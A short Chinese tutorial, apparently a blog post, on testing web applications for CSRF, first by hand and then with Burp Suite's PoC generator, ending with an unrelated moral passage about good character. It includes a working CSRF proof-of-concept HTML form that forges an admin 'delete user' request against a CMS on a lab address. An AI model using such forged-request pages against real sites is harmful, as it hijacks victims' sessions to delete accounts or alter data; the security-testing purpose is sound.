檢測CSRF漏洞
手工檢測
前提
- CSRF只能通過用戶的正規操作進行攻擊,實際上就是劫持用戶操作。
- 在檢測前首先需要確定Web應用程序的所有功能
- 以及確定哪些操作是敏感的
- 比如修改密碼、轉賬、發表留言等功能
第一步 抓取刪除用戶得數據包
第二步 編寫CSRF POC
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.146.148/cms/admin/user.action.php" method="POST">
<input type="hidden" name="act" value="delete" />
<input type="hidden" name="userid" value="31" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
第三步 提交poc查看
半自動檢測
藉助工具burpsuit
第一步 在管理員處添加用戶
第二步 抓取數據包
第三步 右擊—>Engagemet tools—> Generate CSRF PoC
第四步 保存poc,並訪問
第五步 查看添加用戶信息
摘抄
一個人,想要把事情做好,
首先就要學好做人。
人品好了,才能贏得別人的信任;
別人信任你了,纔會尊重你、幫助你。
一個人最好的通行證,
莫過於擁有好的人品,
堂堂正正做人,
本本分分做事。